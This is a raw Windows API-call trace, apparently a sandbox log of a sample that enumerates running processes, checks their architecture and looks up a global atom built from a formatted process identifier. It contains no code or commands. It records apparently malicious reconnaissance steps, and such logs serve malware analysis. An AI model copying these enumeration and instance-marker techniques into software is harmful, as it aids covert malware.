	[0133.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.270] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.270] CloseHandle (hObject=0x2dc) returned 1
	[0133.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.270] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.270] CloseHandle (hObject=0x2dc) returned 1
	[0133.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.271] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.271] CloseHandle (hObject=0x2dc) returned 1
	[0133.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.272] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.272] CloseHandle (hObject=0x2dc) returned 1
	[0133.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.272] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.272] CloseHandle (hObject=0x2dc) returned 1
	[0133.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.272] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.272] CloseHandle (hObject=0x2dc) returned 1
	[0133.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.273] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.273] CloseHandle (hObject=0x2dc) returned 1
	[0133.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.273] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.273] CloseHandle (hObject=0x2dc) returned 1
	[0133.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.274] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.274] CloseHandle (hObject=0x2dc) returned 1
	[0133.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.274] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.274] CloseHandle (hObject=0x2dc) returned 1
	[0133.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.275] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.275] CloseHandle (hObject=0x2dc) returned 1
	[0133.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.275] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.275] CloseHandle (hObject=0x2dc) returned 1
	[0133.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.275] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.275] CloseHandle (hObject=0x2dc) returned 1
	[0133.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.276] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.276] CloseHandle (hObject=0x2dc) returned 1
	[0133.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.276] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.276] CloseHandle (hObject=0x2dc) returned 1
	[0133.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.277] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.277] CloseHandle (hObject=0x2dc) returned 1
	[0133.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.277] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.277] CloseHandle (hObject=0x2dc) returned 1
	[0133.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.277] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.277] CloseHandle (hObject=0x2dc) returned 1
	[0133.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.278] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.278] CloseHandle (hObject=0x2dc) returned 1
	[0133.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.278] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.278] CloseHandle (hObject=0x2dc) returned 1
	[0133.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.279] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.279] CloseHandle (hObject=0x2dc) returned 1
	[0133.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.279] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.279] CloseHandle (hObject=0x2dc) returned 1
	[0133.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.279] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.279] CloseHandle (hObject=0x2dc) returned 1
	[0133.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.280] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.280] CloseHandle (hObject=0x2dc) returned 1
	[0133.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.280] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.280] CloseHandle (hObject=0x2dc) returned 1
	[0133.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.281] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetLastError () returned 0x5
	[0133.282] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.282] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.282] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.283] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.284] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetLastError () returned 0x5
	[0133.285] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.285] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.285] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.286] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.286] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.286] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.286] CloseHandle (hObject=0x2dc) returned 1
	[0133.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.286] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.286] CloseHandle (hObject=0x2dc) returned 1
	[0133.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.287] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.287] CloseHandle (hObject=0x2dc) returned 1
	[0133.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.287] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.287] CloseHandle (hObject=0x2dc) returned 1
	[0133.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.288] CloseHandle (hObject=0x2dc) returned 1
	[0133.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.288] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.288] CloseHandle (hObject=0x2dc) returned 1
	[0133.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16cd8) returned 0xc0000004
	[0133.319] VirtualAlloc (lpAddress=0x0, dwSize=0x16dd8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0133.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16dd8, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0133.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0133.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
